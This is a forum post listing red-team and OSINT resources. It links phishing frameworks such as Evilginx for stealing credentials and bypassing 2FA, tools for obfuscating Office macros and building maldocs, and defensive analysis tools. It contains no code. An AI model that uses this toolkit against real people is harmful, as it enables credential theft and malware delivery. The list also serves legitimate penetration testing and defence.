BadB
Professional
- Messages
- 2,563
- Reaction score
- 2,770
- Points
- 113
OSINT Links & Tools
Maltego
www.maltego.com
Recon-ng
github.com
Google dorks
www.exploit-db.com
PHP Code saving POST data:
gist.github.com
Certificates
www.certificate-transparency.org
transparencyreport.google.com
Domains
Name Generation
github.com
Scoring / Ranking
www.alexa.com
WHOIS privacy / history
https://whois-history.whoisxmlapi.com
Ageing
Web Archive
web.archive.org
Categorization
BlueCoat: http://sitereview.bluecoat.com/sitereview.jsp
Cisco: http://www.senderbase.org/home
McAfee: http://www.mcafee.com/us/threat-center.aspx
Trend Micro: https://global.sitesafety.trendmicro.com
Websense: http://csi.websense.com
Zscaler: http://zulu.zscaler.com
SE Tools
Evilginx (MITM Phishing Framework)
github.com
SET
github.com
BeEF
github.com
GoPhish
github.com
docs.getgophish.com
KingPhisher
github.com
Macro
VBA
Accessing Clipboard
Didier’s resources:
github.com
Obfuscation
github.com
github.com
EvilClippy (Obfuscation)
github.com
outflank.nl
Unicorn (Macro generation and more)
github.com
Macros from remote templates
github.com
Metadata
exiftool.org
Red Teamer Testing Tools
Wireshark: https://www.wireshark.org
Charles Proxy: https://www.charlesproxy.com
Burp: https://portswigger.net/burp
Malware samples
www.hybrid-analysis.com
https://zeltser.com/malware-sample-sources/ (list)
Defender/Analyst tools
videos.didierstevens.com
blog.didierstevens.com
www.decalage.info
github.com
https://gchq.github.io/CyberChef/ (encoder/decoder)
https://code.visualstudio.com/ (Free IDE released by Microsoft)
https://www.automateexcel.com/vba-code-indenter/ (VBA Code Indenter)
https://github.com/MalwareCantFly/Vba2Graph (VBA2Graph)
https://github.com/decalage2/ViperMonkey (VBA Emulation engine written in python)
ASR (Attack Surface Reduction) Rules
OSINT Tools
Facebook Lookup-id.com Sowdust Facebook Matrix Facebook Graph Searcher Facebook Graph, Codes & Operators People Search Engines Family Tree Now PeekYou That'sThem Qwant Webmii ZabaSearch...
www.osinttechniques.com
Maltego
Downloads
From this page you can download the different versions of the Maltego application as well as the CaseFile client.
Recon-ng
GitHub - lanmaster53/recon-ng: Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.
Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources. - lanmaster53/recon-ng
github.com
Google dorks
OffSec’s Exploit Database Archive
The GHDB is an index of search queries (we call them dorks) used to find publicly available information, intended for pentesters and security researchers.
PHP Code saving POST data:
PHP script to dump full HTTP request to file (method, HTTP headers and body).
PHP script to dump full HTTP request to file (method, HTTP headers and body). - dumprequest.php
gist.github.com
Certificates
Certificate Transparency : Certificate Transparency
Certificate Transparency
www.certificate-transparency.org
Google Transparency Report
Domains
Name Generation
GitHub - elceef/dnstwist: Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation
Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation - elceef/dnstwist
github.com
Scoring / Ranking
Alexa
www.alexa.com
WHOIS privacy / history
https://whois-history.whoisxmlapi.com
Ageing
Expired Domains | Daily Updated Domain Lists for 677 TLDs
Information about Expired Domain Names. Check the Availability of thousands of Expired Domains every day before they Drop and after. Just pick what you like!
www.expireddomains.net
Web Archive
Wayback Machine
web.archive.org
Categorization
BlueCoat: http://sitereview.bluecoat.com/sitereview.jsp
Cisco: http://www.senderbase.org/home
McAfee: http://www.mcafee.com/us/threat-center.aspx
Trend Micro: https://global.sitesafety.trendmicro.com
Websense: http://csi.websense.com
Zscaler: http://zulu.zscaler.com
SE Tools
Evilginx (MITM Phishing Framework)
GitHub - kgretzky/evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication - kgretzky/evilginx2
github.com
SET
GitHub - trustedsec/social-engineer-toolkit: The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.
The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here. - trustedsec/social-engineer-toolkit
github.com
BeEF
GitHub - beefproject/beef: The Browser Exploitation Framework Project
The Browser Exploitation Framework Project. Contribute to beefproject/beef development by creating an account on GitHub.
github.com
GoPhish
GitHub - gophish/gophish: Open-Source Phishing Toolkit
Open-Source Phishing Toolkit. Contribute to gophish/gophish development by creating an account on GitHub.
github.com
Introduction | Gophish User Guide
docs.getgophish.com
KingPhisher
GitHub - rsmusllp/king-phisher: Phishing Campaign Toolkit
Phishing Campaign Toolkit. Contribute to rsmusllp/king-phisher development by creating an account on GitHub.
github.com
Macro
VBA
Walkthrough: Calling Windows APIs - Visual Basic
Learn more about: Walkthrough: Calling Windows APIs (Visual Basic)
docs.microsoft.com
Accessing Clipboard
Didier’s resources:
GitHub - DidierStevens/DidierStevensSuite: Please no pull requests for this repository. Thanks!
Please no pull requests for this repository. Thanks! - DidierStevens/DidierStevensSuite
github.com
Obfuscation
GitHub - sevagas/macro_pack: macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments. The goal of macro_pack
macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments...
github.com
GitHub - bonnetn/vba-obfuscator: 2018 School project - PoC of malware code obfuscation in Word macros
2018 School project - PoC of malware code obfuscation in Word macros - bonnetn/vba-obfuscator
github.com
EvilClippy (Obfuscation)
GitHub - outflanknl/EvilClippy: A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows.
A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows. - outflankn...
github.com
Evil Clippy: MS Office maldoc assistant | Outflank
At BlackHat Asia we released Evil Clippy, a tool which assists red teamers and security testers in creating malicious MS Office documents.
outflank.nl
Unicorn (Macro generation and more)
GitHub - trustedsec/unicorn: Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (Tru
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique pre...
github.com
Macros from remote templates
RedTeaming-Tactics-and-Techniques/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros.md at master · mantvydasb/RedTeaming-Tactics-and-Techniques
Red Teaming Tactics and Techniques. Contribute to mantvydasb/RedTeaming-Tactics-and-Techniques development by creating an account on GitHub.
github.com
Metadata
ExifTool by Phil Harvey
A command-line application and Perl library for reading and writing EXIF, GPS, IPTC, XMP, makernotes and other meta information in image, audio and video files. For Windows, MacOS, and Unix systems.
Red Teamer Testing Tools
Wireshark: https://www.wireshark.org
Charles Proxy: https://www.charlesproxy.com
Burp: https://portswigger.net/burp
Malware samples
Free Automated Malware Analysis Service - powered by Falcon Sandbox - File Collections
Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.
Defender/Analyst tools
oledump.py: plugin_msg_summary
Tools: oledump.py Blog post: Update: oledump.py Version 0.0.54 ISC Diary Entry: Analyzing MSG Files With plugin_msg_summary
videos.didierstevens.com
oledump.py
Here is a set of free YouTube videos showing how to use my tools: Workshop Malicious Documents. oledump.py is a program to analyze OLE files (Compound File Binary Format). These files contain strea…
blog.didierstevens.com
oletools - python tools to analyze OLE and MS Office files | Decalage
olevba
oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging. - decalage2/oletools
github.com
https://gchq.github.io/CyberChef/ (encoder/decoder)
https://code.visualstudio.com/ (Free IDE released by Microsoft)
https://www.automateexcel.com/vba-code-indenter/ (VBA Code Indenter)
https://github.com/MalwareCantFly/Vba2Graph (VBA2Graph)
https://github.com/decalage2/ViperMonkey (VBA Emulation engine written in python)
ASR (Attack Surface Reduction) Rules
Use attack surface reduction rules to prevent malware infection - Microsoft Defender for Endpoint
Attack surface reduction rules can help prevent exploits from using apps and scripts to infect devices with malware.
docs.microsoft.com
